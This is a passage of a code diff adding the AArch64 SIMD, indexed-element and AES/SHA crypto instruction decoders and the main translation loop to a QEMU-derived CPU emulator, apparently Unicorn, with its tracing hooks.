gen_helper_neon_cge_s8, gen_helper_neon_cge_s16 }, + { gen_helper_neon_ceq_u8, gen_helper_neon_ceq_u16 }, + }; + NeonGenTwoOpFn *genfn; + int comp; + bool reverse; + TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); + + /* comp = index into [CMGT, CMGE, CMEQ, CMLE, CMLT] */ + comp = (opcode - 0x8) * 2 + u; + /* ...but LE, LT are implemented as reverse GE, GT */ + reverse = (comp > 2); + if (reverse) { + comp = 4 - comp; + } + genfn = fns[comp][size]; + if (reverse) { + genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op); + } else { + genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero); + } + tcg_temp_free_i32(tcg_ctx, tcg_zero); + break; + } + case 0xb: /* ABS, NEG */ + if (u) { + TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); + if (size) { + gen_helper_neon_sub_u16(tcg_ctx, tcg_res, tcg_zero, tcg_op); + } else { + gen_helper_neon_sub_u8(tcg_ctx, tcg_res, tcg_zero, tcg_op); + } + tcg_temp_free_i32(tcg_ctx, tcg_zero); + } else { + if (size) { + gen_helper_neon_abs_s16(tcg_ctx, tcg_res, tcg_op); + } else { + 
gen_helper_neon_abs_s8(tcg_ctx, tcg_res, tcg_op); + } + } + break; + case 0x4: /* CLS, CLZ */ + if (u) { + if (size == 0) { + gen_helper_neon_clz_u8(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_neon_clz_u16(tcg_ctx, tcg_res, tcg_op); + } + } else { + if (size == 0) { + gen_helper_neon_cls_s8(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_neon_cls_s16(tcg_ctx, tcg_res, tcg_op); + } + } + break; + default: + g_assert_not_reached(); + } + } + + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_op); + } + } + if (!is_q) { + clear_vec_high(s, rd); + } + + if (need_rmode) { + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + } + if (need_fpstatus) { + tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); + } +} + +/* C3.6.13 AdvSIMD scalar x indexed element + * 31 30 29 28 24 23 22 21 20 19 16 15 12 11 10 9 5 4 0 + * +-----+---+-----------+------+---+---+------+-----+---+---+------+------+ + * | 0 1 | U | 1 1 1 1 1 | size | L | M | Rm | opc | H | 0 | Rn | Rd | + * +-----+---+-----------+------+---+---+------+-----+---+---+------+------+ + * C3.6.18 AdvSIMD vector x indexed element + * 31 30 29 28 24 23 22 21 20 19 16 15 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+---+------+-----+---+---+------+------+ + * | 0 | Q | U | 0 1 1 1 1 | size | L | M | Rm | opc | H | 0 | Rn | Rd | + * +---+---+---+-----------+------+---+---+------+-----+---+---+------+------+ + */ +static void disas_simd_indexed(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* This encoding has two kinds of instruction: + * normal, where we perform elt x idxelt => elt for each + * element in the vector + * long, where we perform elt x idxelt and generate a result of + * double the width of the input element + * The long ops have a 'part' specifier (ie come in INSN, INSN2 pairs). 
+ */ + bool is_scalar = extract32(insn, 28, 1); + bool is_q = extract32(insn, 30, 1); + bool u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int l = extract32(insn, 21, 1); + int m = extract32(insn, 20, 1); + /* Note that the Rm field here is only 4 bits, not 5 as it usually is */ + int rm = extract32(insn, 16, 4); + int opcode = extract32(insn, 12, 4); + int h = extract32(insn, 11, 1); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + bool is_long = false; + bool is_fp = false; + int index; + TCGv_ptr fpst; + + switch (opcode) { + case 0x0: /* MLA */ + case 0x4: /* MLS */ + if (!u || is_scalar) { + unallocated_encoding(s); + return; + } + break; + case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + case 0xa: /* SMULL, SMULL2, UMULL, UMULL2 */ + if (is_scalar) { + unallocated_encoding(s); + return; + } + is_long = true; + break; + case 0x3: /* SQDMLAL, SQDMLAL2 */ + case 0x7: /* SQDMLSL, SQDMLSL2 */ + case 0xb: /* SQDMULL, SQDMULL2 */ + is_long = true; + /* fall through */ + case 0xc: /* SQDMULH */ + case 0xd: /* SQRDMULH */ + if (u) { + unallocated_encoding(s); + return; + } + break; + case 0x8: /* MUL */ + if (u || is_scalar) { + unallocated_encoding(s); + return; + } + break; + case 0x1: /* FMLA */ + case 0x5: /* FMLS */ + if (u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x9: /* FMUL, FMULX */ + if (!extract32(size, 1, 1)) { + unallocated_encoding(s); + return; + } + is_fp = true; + break; + default: + unallocated_encoding(s); + return; + } + + if (is_fp) { + /* low bit of size indicates single/double */ + size = extract32(size, 0, 1) ? 
3 : 2; + if (size == 2) { + index = h << 1 | l; + } else { + if (l || !is_q) { + unallocated_encoding(s); + return; + } + index = h; + } + rm |= (m << 4); + } else { + switch (size) { + case 1: + index = h << 2 | l << 1 | m; + break; + case 2: + index = h << 1 | l; + rm |= (m << 4); + break; + default: + unallocated_encoding(s); + return; + } + } + + if (!fp_access_check(s)) { + return; + } + + if (is_fp) { + fpst = get_fpstatus_ptr(tcg_ctx); + } else { + TCGV_UNUSED_PTR(fpst); + } + + if (size == 3) { + TCGv_i64 tcg_idx = tcg_temp_new_i64(tcg_ctx); + int pass; + + assert(is_fp && is_q && !is_long); + + read_vec_element(s, tcg_idx, rm, index, MO_64); + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op, rn, pass, MO_64); + + switch (opcode) { + case 0x5: /* FMLS */ + /* As usual for ARM, separate negation for fused multiply-add */ + gen_helper_vfp_negd(tcg_ctx, tcg_op, tcg_op); + /* fall through */ + case 0x1: /* FMLA */ + read_vec_element(s, tcg_res, rd, pass, MO_64); + gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); + break; + case 0x9: /* FMUL, FMULX */ + if (u) { + gen_helper_vfp_mulxd(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); + } else { + gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); + } + break; + default: + g_assert_not_reached(); + } + + write_vec_element(s, tcg_res, rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_op); + tcg_temp_free_i64(tcg_ctx, tcg_res); + } + + if (is_scalar) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_idx); + } else if (!is_long) { + /* 32 bit floating point, or 16 or 32 bit integer. + * For the 16 bit scalar case we use the usual Neon helpers and + * rely on the fact that 0 op 0 == 0 with no side effects. 
+ */ + TCGv_i32 tcg_idx = tcg_temp_new_i32(tcg_ctx); + int pass, maxpasses; + + if (is_scalar) { + maxpasses = 1; + } else { + maxpasses = is_q ? 4 : 2; + } + + read_vec_element_i32(s, tcg_idx, rm, index, size); + + if (size == 1 && !is_scalar) { + /* The simplest way to handle the 16x16 indexed ops is to duplicate + * the index into both halves of the 32 bit tcg_idx and then use + * the usual Neon helpers. + */ + tcg_gen_deposit_i32(tcg_ctx, tcg_idx, tcg_idx, tcg_idx, 16, 16); + } + + for (pass = 0; pass < maxpasses; pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_op, rn, pass, is_scalar ? size : MO_32); + + switch (opcode) { + case 0x0: /* MLA */ + case 0x4: /* MLS */ + case 0x8: /* MUL */ + { + static NeonGenTwoOpFn * const fns[2][2] = { + { gen_helper_neon_add_u16, gen_helper_neon_sub_u16 }, + { tcg_gen_add_i32, tcg_gen_sub_i32 }, + }; + NeonGenTwoOpFn *genfn; + bool is_sub = opcode == 0x4; + + if (size == 1) { + gen_helper_neon_mul_u16(tcg_ctx, tcg_res, tcg_op, tcg_idx); + } else { + tcg_gen_mul_i32(tcg_ctx, tcg_res, tcg_op, tcg_idx); + } + if (opcode == 0x8) { + break; + } + read_vec_element_i32(s, tcg_op, rd, pass, MO_32); + genfn = fns[size - 1][is_sub]; + genfn(tcg_ctx, tcg_res, tcg_op, tcg_res); + break; + } + case 0x5: /* FMLS */ + /* As usual for ARM, separate negation for fused multiply-add */ + gen_helper_vfp_negs(tcg_ctx, tcg_op, tcg_op); + /* fall through */ + case 0x1: /* FMLA */ + read_vec_element_i32(s, tcg_res, rd, pass, MO_32); + gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); + break; + case 0x9: /* FMUL, FMULX */ + if (u) { + gen_helper_vfp_mulxs(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); + } else { + gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); + } + break; + case 0xc: /* SQDMULH */ + if (size == 1) { + gen_helper_neon_qdmulh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_op, tcg_idx); + } else { + 
gen_helper_neon_qdmulh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_op, tcg_idx); + } + break; + case 0xd: /* SQRDMULH */ + if (size == 1) { + gen_helper_neon_qrdmulh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_op, tcg_idx); + } else { + gen_helper_neon_qrdmulh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_op, tcg_idx); + } + break; + default: + g_assert_not_reached(); + } + + if (is_scalar) { + write_fp_sreg(s, rd, tcg_res); + } else { + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + } + + tcg_temp_free_i32(tcg_ctx, tcg_op); + tcg_temp_free_i32(tcg_ctx, tcg_res); + } + + tcg_temp_free_i32(tcg_ctx, tcg_idx); + + if (!is_q) { + clear_vec_high(s, rd); + } + } else { + /* long ops: 16x16->32 or 32x32->64 */ + TCGv_i64 tcg_res[2]; + int pass; + bool satop = extract32(opcode, 0, 1); + TCGMemOp memop = MO_32; + + if (satop || !u) { + memop |= MO_SIGN; + } + + if (size == 2) { + TCGv_i64 tcg_idx = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_idx, rm, index, memop); + + for (pass = 0; pass < (is_scalar ? 
1 : 2); pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_passres; + int passelt; + + if (is_scalar) { + passelt = 0; + } else { + passelt = pass + (is_q * 2); + } + + read_vec_element(s, tcg_op, rn, passelt, memop); + + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + if (opcode == 0xa || opcode == 0xb) { + /* Non-accumulating ops */ + tcg_passres = tcg_res[pass]; + } else { + tcg_passres = tcg_temp_new_i64(tcg_ctx); + } + + tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op, tcg_idx); + tcg_temp_free_i64(tcg_ctx, tcg_op); + + if (satop) { + /* saturating, doubling */ + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, + tcg_passres, tcg_passres); + } + + if (opcode == 0xa || opcode == 0xb) { + continue; + } + + /* Accumulating op: handle accumulate step */ + read_vec_element(s, tcg_res[pass], rd, pass, MO_64); + + switch (opcode) { + case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); + break; + case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + tcg_gen_sub_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); + break; + case 0x7: /* SQDMLSL, SQDMLSL2 */ + tcg_gen_neg_i64(tcg_ctx, tcg_passres, tcg_passres); + /* fall through */ + case 0x3: /* SQDMLAL, SQDMLAL2 */ + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, + tcg_res[pass], + tcg_passres); + break; + default: + g_assert_not_reached(); + } + tcg_temp_free_i64(tcg_ctx, tcg_passres); + } + tcg_temp_free_i64(tcg_ctx, tcg_idx); + + if (is_scalar) { + clear_vec_high(s, rd); + } + } else { + TCGv_i32 tcg_idx = tcg_temp_new_i32(tcg_ctx); + + assert(size == 1); + read_vec_element_i32(s, tcg_idx, rm, index, size); + + if (!is_scalar) { + /* The simplest way to handle the 16x16 indexed ops is to + * duplicate the index into both halves of the 32 bit tcg_idx + * and then use the usual Neon helpers. 
+ */ + tcg_gen_deposit_i32(tcg_ctx, tcg_idx, tcg_idx, tcg_idx, 16, 16); + } + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 tcg_passres; + + if (is_scalar) { + read_vec_element_i32(s, tcg_op, rn, pass, size); + } else { + read_vec_element_i32(s, tcg_op, rn, + pass + (is_q * 2), MO_32); + } + + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + if (opcode == 0xa || opcode == 0xb) { + /* Non-accumulating ops */ + tcg_passres = tcg_res[pass]; + } else { + tcg_passres = tcg_temp_new_i64(tcg_ctx); + } + + if (memop & MO_SIGN) { + gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op, tcg_idx); + } else { + gen_helper_neon_mull_u16(tcg_ctx, tcg_passres, tcg_op, tcg_idx); + } + if (satop) { + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, + tcg_passres, tcg_passres); + } + tcg_temp_free_i32(tcg_ctx, tcg_op); + + if (opcode == 0xa || opcode == 0xb) { + continue; + } + + /* Accumulating op: handle accumulate step */ + read_vec_element(s, tcg_res[pass], rd, pass, MO_64); + + switch (opcode) { + case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + gen_helper_neon_addl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], + tcg_passres); + break; + case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + gen_helper_neon_subl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], + tcg_passres); + break; + case 0x7: /* SQDMLSL, SQDMLSL2 */ + gen_helper_neon_negl_u32(tcg_ctx, tcg_passres, tcg_passres); + /* fall through */ + case 0x3: /* SQDMLAL, SQDMLAL2 */ + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, + tcg_res[pass], + tcg_passres); + break; + default: + g_assert_not_reached(); + } + tcg_temp_free_i64(tcg_ctx, tcg_passres); + } + tcg_temp_free_i32(tcg_ctx, tcg_idx); + + if (is_scalar) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_res[0], tcg_res[0]); + } + } + + if (is_scalar) { + tcg_res[1] = tcg_const_i64(tcg_ctx, 0); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, 
pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } + } + + if (!TCGV_IS_UNUSED_PTR(fpst)) { + tcg_temp_free_ptr(tcg_ctx, fpst); + } +} + +/* C3.6.19 Crypto AES + * 31 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +-----------------+------+-----------+--------+-----+------+------+ + * | 0 1 0 0 1 1 1 0 | size | 1 0 1 0 0 | opcode | 1 0 | Rn | Rd | + * +-----------------+------+-----------+--------+-----+------+------+ + */ +static void disas_crypto_aes(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + int decrypt; + TCGv_i32 tcg_rd_regno, tcg_rn_regno, tcg_decrypt; + CryptoThreeOpEnvFn *genfn; + + if (!arm_dc_feature(s, ARM_FEATURE_V8_AES) + || size != 0) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 0x4: /* AESE */ + decrypt = 0; + genfn = gen_helper_crypto_aese; + break; + case 0x6: /* AESMC */ + decrypt = 0; + genfn = gen_helper_crypto_aesmc; + break; + case 0x5: /* AESD */ + decrypt = 1; + genfn = gen_helper_crypto_aese; + break; + case 0x7: /* AESIMC */ + decrypt = 1; + genfn = gen_helper_crypto_aesmc; + break; + default: + unallocated_encoding(s); + return; + } + + /* Note that we convert the Vx register indexes into the + * index within the vfp.regs[] array, so we can share the + * helper with the AArch32 instructions. 
+ */ + tcg_rd_regno = tcg_const_i32(tcg_ctx, rd << 1); + tcg_rn_regno = tcg_const_i32(tcg_ctx, rn << 1); + tcg_decrypt = tcg_const_i32(tcg_ctx, decrypt); + + genfn(tcg_ctx, tcg_ctx->cpu_env, tcg_rd_regno, tcg_rn_regno, tcg_decrypt); + + tcg_temp_free_i32(tcg_ctx, tcg_rd_regno); + tcg_temp_free_i32(tcg_ctx, tcg_rn_regno); + tcg_temp_free_i32(tcg_ctx, tcg_decrypt); +} + +/* C3.6.20 Crypto three-reg SHA + * 31 24 23 22 21 20 16 15 14 12 11 10 9 5 4 0 + * +-----------------+------+---+------+---+--------+-----+------+------+ + * | 0 1 0 1 1 1 1 0 | size | 0 | Rm | 0 | opcode | 0 0 | Rn | Rd | + * +-----------------+------+---+------+---+--------+-----+------+------+ + */ +static void disas_crypto_three_reg_sha(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 3); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + CryptoThreeOpEnvFn *genfn; + TCGv_i32 tcg_rd_regno, tcg_rn_regno, tcg_rm_regno; + int feature = ARM_FEATURE_V8_SHA256; + + if (size != 0) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 0: /* SHA1C */ + case 1: /* SHA1P */ + case 2: /* SHA1M */ + case 3: /* SHA1SU0 */ + genfn = NULL; + feature = ARM_FEATURE_V8_SHA1; + break; + case 4: /* SHA256H */ + genfn = gen_helper_crypto_sha256h; + break; + case 5: /* SHA256H2 */ + genfn = gen_helper_crypto_sha256h2; + break; + case 6: /* SHA256SU1 */ + genfn = gen_helper_crypto_sha256su1; + break; + default: + unallocated_encoding(s); + return; + } + + if (!arm_dc_feature(s, feature)) { + unallocated_encoding(s); + return; + } + + tcg_rd_regno = tcg_const_i32(tcg_ctx, rd << 1); + tcg_rn_regno = tcg_const_i32(tcg_ctx, rn << 1); + tcg_rm_regno = tcg_const_i32(tcg_ctx, rm << 1); + + if (genfn) { + genfn(tcg_ctx, tcg_ctx->cpu_env, tcg_rd_regno, tcg_rn_regno, tcg_rm_regno); + } else { + TCGv_i32 tcg_opcode = tcg_const_i32(tcg_ctx, opcode); + + 
gen_helper_crypto_sha1_3reg(tcg_ctx, tcg_ctx->cpu_env, tcg_rd_regno, + tcg_rn_regno, tcg_rm_regno, tcg_opcode); + tcg_temp_free_i32(tcg_ctx, tcg_opcode); + } + + tcg_temp_free_i32(tcg_ctx, tcg_rd_regno); + tcg_temp_free_i32(tcg_ctx, tcg_rn_regno); + tcg_temp_free_i32(tcg_ctx, tcg_rm_regno); +} + +/* C3.6.21 Crypto two-reg SHA + * 31 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +-----------------+------+-----------+--------+-----+------+------+ + * | 0 1 0 1 1 1 1 0 | size | 1 0 1 0 0 | opcode | 1 0 | Rn | Rd | + * +-----------------+------+-----------+--------+-----+------+------+ + */ +static void disas_crypto_two_reg_sha(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + CryptoTwoOpEnvFn *genfn; + int feature; + TCGv_i32 tcg_rd_regno, tcg_rn_regno; + + if (size != 0) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 0: /* SHA1H */ + feature = ARM_FEATURE_V8_SHA1; + genfn = gen_helper_crypto_sha1h; + break; + case 1: /* SHA1SU1 */ + feature = ARM_FEATURE_V8_SHA1; + genfn = gen_helper_crypto_sha1su1; + break; + case 2: /* SHA256SU0 */ + feature = ARM_FEATURE_V8_SHA256; + genfn = gen_helper_crypto_sha256su0; + break; + default: + unallocated_encoding(s); + return; + } + + if (!arm_dc_feature(s, feature)) { + unallocated_encoding(s); + return; + } + + tcg_rd_regno = tcg_const_i32(tcg_ctx, rd << 1); + tcg_rn_regno = tcg_const_i32(tcg_ctx, rn << 1); + + genfn(tcg_ctx, tcg_ctx->cpu_env, tcg_rd_regno, tcg_rn_regno); + + tcg_temp_free_i32(tcg_ctx, tcg_rd_regno); + tcg_temp_free_i32(tcg_ctx, tcg_rn_regno); +} + +/* C3.6 Data processing - SIMD, inc Crypto + * + * As the decode gets a little complex we are using a table based + * approach for this part of the decode. 
+ */ +static const AArch64DecodeTable data_proc_simd[] = { + /* pattern , mask , fn */ + { 0x0e200400, 0x9f200400, disas_simd_three_reg_same }, + { 0x0e200000, 0x9f200c00, disas_simd_three_reg_diff }, + { 0x0e200800, 0x9f3e0c00, disas_simd_two_reg_misc }, + { 0x0e300800, 0x9f3e0c00, disas_simd_across_lanes }, + { 0x0e000400, 0x9fe08400, disas_simd_copy }, + { 0x0f000000, 0x9f000400, disas_simd_indexed }, /* vector indexed */ + /* simd_mod_imm decode is a subset of simd_shift_imm, so must precede it */ + { 0x0f000400, 0x9ff80400, disas_simd_mod_imm }, + { 0x0f000400, 0x9f800400, disas_simd_shift_imm }, + { 0x0e000000, 0xbf208c00, disas_simd_tb }, + { 0x0e000800, 0xbf208c00, disas_simd_zip_trn }, + { 0x2e000000, 0xbf208400, disas_simd_ext }, + { 0x5e200400, 0xdf200400, disas_simd_scalar_three_reg_same }, + { 0x5e200000, 0xdf200c00, disas_simd_scalar_three_reg_diff }, + { 0x5e200800, 0xdf3e0c00, disas_simd_scalar_two_reg_misc }, + { 0x5e300800, 0xdf3e0c00, disas_simd_scalar_pairwise }, + { 0x5e000400, 0xdfe08400, disas_simd_scalar_copy }, + { 0x5f000000, 0xdf000400, disas_simd_indexed }, /* scalar indexed */ + { 0x5f000400, 0xdf800400, disas_simd_scalar_shift_imm }, + { 0x4e280800, 0xff3e0c00, disas_crypto_aes }, + { 0x5e000000, 0xff208c00, disas_crypto_three_reg_sha }, + { 0x5e280800, 0xff3e0c00, disas_crypto_two_reg_sha }, + { 0x00000000, 0x00000000, NULL } +}; + +static void disas_data_proc_simd(DisasContext *s, uint32_t insn) +{ + /* Note that this is called with all non-FP cases from + * table C3-6 so it must UNDEF for entries not specifically + * allocated to instructions in that table. 
+ */ + AArch64DecodeFn *fn = lookup_disas_fn(&data_proc_simd[0], insn); + if (fn) { + fn(s, insn); + } else { + unallocated_encoding(s); + } +} + +/* C3.6 Data processing - SIMD and floating point */ +static void disas_data_proc_simd_fp(DisasContext *s, uint32_t insn) +{ + if (extract32(insn, 28, 1) == 1 && extract32(insn, 30, 1) == 0) { + disas_data_proc_fp(s, insn); + } else { + /* SIMD, including crypto */ + disas_data_proc_simd(s, insn); + } +} + +/* C3.1 A64 instruction index by encoding */ +static void disas_a64_insn(CPUARMState *env, DisasContext *s) +{ + uint32_t insn; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + + // Unicorn: end address tells us to stop emulation + if (s->pc == s->uc->addr_end) { + // imitate WFI instruction to halt emulation + s->is_jmp = DISAS_WFI; + return; + } + + insn = arm_ldl_code(env, s->pc, s->bswap_code); + s->insn = insn; + s->pc += 4; + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, s->pc - 4)) { + gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, env->uc, s->pc - 4); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + s->fp_access_checked = false; + + switch (extract32(insn, 25, 4)) { + case 0x0: case 0x1: case 0x2: case 0x3: /* UNALLOCATED */ + unallocated_encoding(s); + break; + case 0x8: case 0x9: /* Data processing - immediate */ + disas_data_proc_imm(s, insn); + break; + case 0xa: case 0xb: /* Branch, exception generation and system insns */ + disas_b_exc_sys(s, insn); + break; + case 0x4: + case 0x6: + case 0xc: + case 0xe: /* Loads and stores */ + disas_ldst(s, insn); + break; + case 0x5: + case 0xd: /* Data processing - register */ + disas_data_proc_reg(s, insn); + break; + case 0x7: + case 0xf: /* Data processing - SIMD and floating point */ + disas_data_proc_simd_fp(s, insn); + break; + default: + assert(FALSE); /* all 15 cases should be handled above */ + break; + } + + /* if we allocated any temporaries, free them here */ + 
free_tmp_a64(s); +} + +void gen_intermediate_code_internal_a64(ARMCPU *cpu, + TranslationBlock *tb, + bool search_pc) +{ + CPUState *cs = CPU(cpu); + CPUARMState *env = &cpu->env; + DisasContext dc1, *dc = &dc1; + CPUBreakpoint *bp; + uint16_t *gen_opc_end; + int j, lj; + target_ulong pc_start; + target_ulong next_page_start; + int num_insns; + int max_insns; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + bool block_full = false; + + pc_start = tb->pc; + + dc->uc = env->uc; + dc->tb = tb; + + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + + dc->is_jmp = DISAS_NEXT; + dc->pc = pc_start; + dc->singlestep_enabled = cs->singlestep_enabled; + dc->condjmp = 0; + + dc->aarch64 = 1; + dc->thumb = 0; +#if defined(TARGET_WORDS_BIGENDIAN) + dc->bswap_code = 1; +#else + dc->bswap_code = 0; +#endif + dc->condexec_mask = 0; + dc->condexec_cond = 0; +#if !defined(CONFIG_USER_ONLY) + dc->user = (ARM_TBFLAG_AA64_EL(tb->flags) == 0); +#endif + dc->cpacr_fpen = ARM_TBFLAG_AA64_FPEN(tb->flags); + dc->vec_len = 0; + dc->vec_stride = 0; + dc->cp_regs = cpu->cp_regs; + dc->current_el = arm_current_el(env); + dc->features = env->features; + + /* Single step state. The code-generation logic here is: + * SS_ACTIVE == 0: + * generate code with no special handling for single-stepping (except + * that anything that can make us go to SS_ACTIVE == 1 must end the TB; + * this happens anyway because those changes are all system register or + * PSTATE writes). 
+ * SS_ACTIVE == 1, PSTATE.SS == 1: (active-not-pending) + * emit code for one insn + * emit code to clear PSTATE.SS + * emit code to generate software step exception for completed step + * end TB (as usual for having generated an exception) + * SS_ACTIVE == 1, PSTATE.SS == 0: (active-pending) + * emit code to generate a software step exception + * end the TB + */ + dc->ss_active = ARM_TBFLAG_AA64_SS_ACTIVE(tb->flags); + dc->pstate_ss = ARM_TBFLAG_AA64_PSTATE_SS(tb->flags); + dc->is_ldex = false; + dc->ss_same_el = (arm_debug_target_el(env) == dc->current_el); + + init_tmp_a64_array(dc); + + next_page_start = (pc_start & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE; + lj = -1; + num_insns = 0; + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) { + max_insns = CF_COUNT_MASK; + } + + tcg_clear_temp_count(); + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + // imitate WFI instruction to halt emulation + gen_tb_start(tcg_ctx); + dc->is_jmp = DISAS_WFI; + goto tb_end; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } else { + env->uc->size_arg = -1; + } + + gen_tb_start(tcg_ctx); + + do { + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == dc->pc) { + gen_exception_internal_insn(dc, 0, EXCP_DEBUG); + /* Advance PC so that clearing the breakpoint will + invalidate this TB. 
*/ + dc->pc += 2; + goto done_generating; + } + } + } + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) { + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + } + tcg_ctx->gen_opc_pc[lj] = dc->pc; + tcg_ctx->gen_opc_instr_start[lj] = 1; + //tcg_ctx->gen_opc_icount[lj] = num_insns; + } + + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) { + // gen_io_start(); + //} + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, dc->pc); + } + + if (dc->ss_active && !dc->pstate_ss) { + /* Singlestep state is Active-pending. + * If we're in this state at the start of a TB then either + * a) we just took an exception to an EL which is being debugged + * and this is the first insn in the exception handler + * b) debug exceptions were masked and we just unmasked them + * without changing EL (eg by clearing PSTATE.D) + * In either case we're going to take a swstep exception in the + * "did not step an insn" case, and so the syndrome ISV and EX + * bits should be zero. + */ + assert(num_insns == 0); + gen_exception(dc, EXCP_UDEF, syn_swstep(dc->ss_same_el, 0, 0)); + dc->is_jmp = 